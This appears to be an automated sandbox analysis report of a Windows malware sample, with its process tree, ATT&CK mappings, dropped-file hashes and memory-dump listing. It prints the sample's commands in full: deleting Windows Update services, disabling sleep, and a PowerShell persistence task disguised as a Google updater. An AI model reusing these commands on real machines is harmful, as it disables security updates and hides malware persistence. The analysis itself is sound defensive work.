  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5056
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5064
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4356
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4448
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5084
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2568
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4312
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4304
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:5116
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4316
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3312
- C:\Windows\system32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:944
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2820
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4392
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:512
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#heofpouz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4844
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe gstjejrd
  2⤵
  PID:1512
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    PID:2936
- C:\Windows\system32\cmd.exe
  cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    PID:4768
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe arixcpbokijbgqka 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/PBl0DAJJpBWZOe3/iyMK8EiHRyle/UgXrorW2cTfGmU+ZqgnS8GFBeBcAx1jNsrRrHuXO/jn0QNzl/MVUlFKMHzNzl+tfPBmBRkPqn7NyGedkw9imzPOxbSnXCapa8rfJVdunX0GpQ7HpFGc9emLPQ8WREtcodNFq+fVtogDzOBV+t8TAsr09jqoFcQtnRJG+b0LCufoajEi9cwlf7f6xAMsaAA81L/N3fnv8OqYXgnunds+naNrLrF/JKIYyQF1u0CibpWZUPa6FKV9e9WhVA4/ydK5smRbFNDircb097sPNFTMiwnY32+dgz6C22bE1atD7RTvI/AZLgUm4eXgFj5tmyWJfbnIkz3TLvgMJpcKZhqTKMr1cPIbskeBEKEDnXgPQweUpXiRyhCrw2LvxqlN2InL9et/eTahxVlXiEq/mGFOuRrlogJa95y+CYMLy495cVw//gO/G992Kq2csJtHtAu7qwdD5fQ4HnWGR7M=
  2⤵
  PID:2100

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
2.5MB

MD5
07d8313dc97a38fa95eb7c1154c7d03b

SHA1
00e8ad6af68ae57527924eeb8ed100b6dfdcb70a

SHA256
86b0f72e6e0f307582a703ce7db45fe8997ce1a9d9db8d356f927be14b5d9b02

SHA512
698488385a5f12cbffa4f7777328e88a2650a28399298856c995d4b6ace4a8cb48913eab40dc359c9e77567ceffbcb36eac1fa5c9f4ccd1efb511162936fd870

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
2.5MB

MD5
07d8313dc97a38fa95eb7c1154c7d03b

SHA1
00e8ad6af68ae57527924eeb8ed100b6dfdcb70a

SHA256
86b0f72e6e0f307582a703ce7db45fe8997ce1a9d9db8d356f927be14b5d9b02

SHA512
698488385a5f12cbffa4f7777328e88a2650a28399298856c995d4b6ace4a8cb48913eab40dc359c9e77567ceffbcb36eac1fa5c9f4ccd1efb511162936fd870

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cc426d337f597f6f808484c3ac5e7ceb

SHA1
cf3de14a770f3cb17d8eacad2fcfaf360c80d6da

SHA256
5703420fc5e0801463c94871d0f29ca9702e01f45d92ee701e653bfe614db481

SHA512
40620285af304c2852e4a435dd00ec21b1c57efd8a9119e7ad384e893355aeaa0764c51c131520f4108a971610419bae3c7f1d48618be35d1cb97074615d556f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f3cc86121c5e730d41f141f24dfa09f7

SHA1
032c7899c88ba9b8ec7a6d9adc79daf455c7e105

SHA256
f78126c988eb06f9ca028dac749a13b9fc0093c43b5f898935977e98da1aa960

SHA512
4a6963c4b2e31fa51b51c41532e282beca5836c7ef442fbd8d40f723226432c3c5b31603d4d92ab2083d56ad5d5ec32e1417dfb8e3e0256abb55d5195657f882

Download Submit
C:\Users\Admin\AppData\Local\MySQL Community\fbot.exe

Filesize
2.5MB

MD5
a60a03cd5f2401270a4e8975f54f8e28

SHA1
0cee42743d340c3e9d80a3402abb461c466c1f25

SHA256
dfc3431f28ecc6479e13846c0c0f5820d8c52e47c5693bfc3442eccac5ab5b24

SHA512
595a63201c3849d14f440abad29a20aaf21f1585c381ef817d2d321c1200736b883801b3c665b6c8d7e75c91afdd25e9afcf15125035bbf91ea5383810bd31f2

Download Submit
C:\Users\Admin\AppData\Local\MySQL Community\fbot.exe

Filesize
2.5MB

MD5
a60a03cd5f2401270a4e8975f54f8e28

SHA1
0cee42743d340c3e9d80a3402abb461c466c1f25

SHA256
dfc3431f28ecc6479e13846c0c0f5820d8c52e47c5693bfc3442eccac5ab5b24

SHA512
595a63201c3849d14f440abad29a20aaf21f1585c381ef817d2d321c1200736b883801b3c665b6c8d7e75c91afdd25e9afcf15125035bbf91ea5383810bd31f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x031l5av.j5g.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
14469654032eef9970a114167dd53790

SHA1
5b01aecfc3e0f7218aceb17c5df68191c80f2135

SHA256
f6b8dbe9758a075fde017ba89d6b2ad67b2fb3864b5b66c3e0d28e53b6773123

SHA512
24b0d4eaf7c46daf162ae7507e0139c9949064ec3ac3d1e09576f1d526282e6f4061c893e2fdfd32379c83d2edac8a3c08385dd8bd327b9a5b2693cd8b13a351

Download Submit
memory/1328-236-0x00000273CC940000-0x00000273CC950000-memory.dmp

Filesize
64KB

Download
memory/1328-199-0x00000273CC940000-0x00000273CC950000-memory.dmp

Filesize
64KB

Download
memory/1328-198-0x00000273CC940000-0x00000273CC950000-memory.dmp

Filesize
64KB

Download
memory/1512-732-0x00007FF642A70000-0x00007FF642AB9000-memory.dmp

Filesize
292KB

Download
memory/1712-340-0x000001EC29E30000-0x000001EC29E3A000-memory.dmp

Filesize
40KB

Download
memory/1712-292-0x000001EC27BA0000-0x000001EC27BB0000-memory.dmp

Filesize
64KB

Download
memory/1712-398-0x000001EC27BA0000-0x000001EC27BB0000-memory.dmp

Filesize
64KB

Download
memory/1712-397-0x000001EC27BA0000-0x000001EC27BB0000-memory.dmp

Filesize
64KB

Download
memory/1712-307-0x00007FF798420000-0x00007FF798430000-memory.dmp

Filesize
64KB

Download
memory/1712-306-0x000001EC2A310000-0x000001EC2A3C9000-memory.dmp

Filesize
740KB

Download
memory/1712-300-0x000001EC29E10000-0x000001EC29E2C000-memory.dmp

Filesize
112KB

Download
memory/1712-293-0x000001EC27BA0000-0x000001EC27BB0000-memory.dmp

Filesize
64KB

Download
memory/2100-737-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-745-0x0000019DC7120000-0x0000019DC7140000-memory.dmp

Filesize
128KB

Download
memory/2100-740-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-744-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-734-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-733-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-730-0x0000019D34620000-0x0000019D34660000-memory.dmp

Filesize
256KB

Download
memory/2100-727-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-726-0x0000019D345D0000-0x0000019D345F0000-memory.dmp

Filesize
128KB

Download
memory/2100-741-0x0000019DC7120000-0x0000019DC7140000-memory.dmp

Filesize
128KB

Download
memory/2100-770-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-767-0x0000019DC7560000-0x0000019DC7580000-memory.dmp

Filesize
128KB

Download
memory/2100-748-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-751-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-766-0x0000019DC7330000-0x0000019DC7350000-memory.dmp

Filesize
128KB

Download
memory/2100-754-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-757-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-765-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-762-0x0000019DC7560000-0x0000019DC7580000-memory.dmp

Filesize
128KB

Download
memory/2100-760-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp

Filesize
8.0MB

Download
memory/2100-761-0x0000019DC7330000-0x0000019DC7350000-memory.dmp

Filesize
128KB

Download
memory/2932-242-0x00007FF626720000-0x00007FF6269A6000-memory.dmp

Filesize
2.5MB

Download
memory/3168-139-0x0000000000970000-0x00000000012F2000-memory.dmp

Filesize
9.5MB

Download
memory/3168-125-0x0000000000970000-0x00000000012F2000-memory.dmp

Filesize
9.5MB

Download
memory/3168-129-0x0000000005430000-0x0000000005440000-memory.dmp

Filesize
64KB

Download
memory/3168-121-0x0000000000970000-0x00000000012F2000-memory.dmp

Filesize
9.5MB

Download
memory/3168-127-0x0000000005960000-0x0000000005E5E000-memory.dmp

Filesize
5.0MB

Download
memory/3168-126-0x0000000000970000-0x00000000012F2000-memory.dmp

Filesize
9.5MB

Download
memory/3168-130-0x0000000005400000-0x000000000540A000-memory.dmp

Filesize
40KB

Download
memory/3168-133-0x0000000005430000-0x0000000005440000-memory.dmp

Filesize
64KB

Download
memory/3168-235-0x0000000005430000-0x0000000005440000-memory.dmp

Filesize
64KB

Download
memory/3168-131-0x0000000006240000-0x0000000006616000-memory.dmp

Filesize
3.8MB

Download
memory/3168-128-0x0000000005460000-0x00000000054F2000-memory.dmp

Filesize
584KB

Download
memory/3168-243-0x0000000005430000-0x0000000005440000-memory.dmp

Filesize
64KB

Download
memory/3168-132-0x000000000B240000-0x000000000B2DC000-memory.dmp

Filesize
624KB

Download
memory/3264-267-0x0000021079500000-0x0000021079510000-memory.dmp

Filesize
64KB

Download
memory/3264-268-0x0000021079500000-0x0000021079510000-memory.dmp

Filesize
64KB

Download
memory/3476-148-0x000001E6D0140000-0x000001E6D0150000-memory.dmp

Filesize
64KB

Download
memory/3476-185-0x000001E6D0140000-0x000001E6D0150000-memory.dmp

Filesize
64KB

Download
memory/3476-145-0x000001E6EA780000-0x000001E6EA7A2000-memory.dmp

Filesize
136KB

Download
memory/3476-146-0x000001E6D0140000-0x000001E6D0150000-memory.dmp

Filesize
64KB

Download
memory/3476-151-0x000001E6EA930000-0x000001E6EA9A6000-memory.dmp

Filesize
472KB

Download
memory/4844-557-0x00007FF7984E0000-0x00007FF7984F0000-memory.dmp

Filesize
64KB

Download
memory/4844-558-0x000001F22D000000-0x000001F22D010000-memory.dmp

Filesize
64KB

Download
memory/4844-681-0x000001F22F850000-0x000001F22F86C000-memory.dmp

Filesize
112KB

Download
memory/4844-441-0x000001F22D000000-0x000001F22D010000-memory.dmp

Filesize
64KB

Download
memory/4844-440-0x000001F22D000000-0x000001F22D010000-memory.dmp

Filesize
64KB

Download
memory/4844-688-0x000001F22D000000-0x000001F22D010000-memory.dmp

Filesize
64KB

Download
memory/4844-715-0x000001F22D009000-0x000001F22D00F000-memory.dmp

Filesize
24KB

Download
memory/5020-556-0x00007FF618090000-0x00007FF618316000-memory.dmp

Filesize
2.5MB

Download
memory/5020-725-0x00007FF618090000-0x00007FF618316000-memory.dmp

Filesize
2.5MB

Download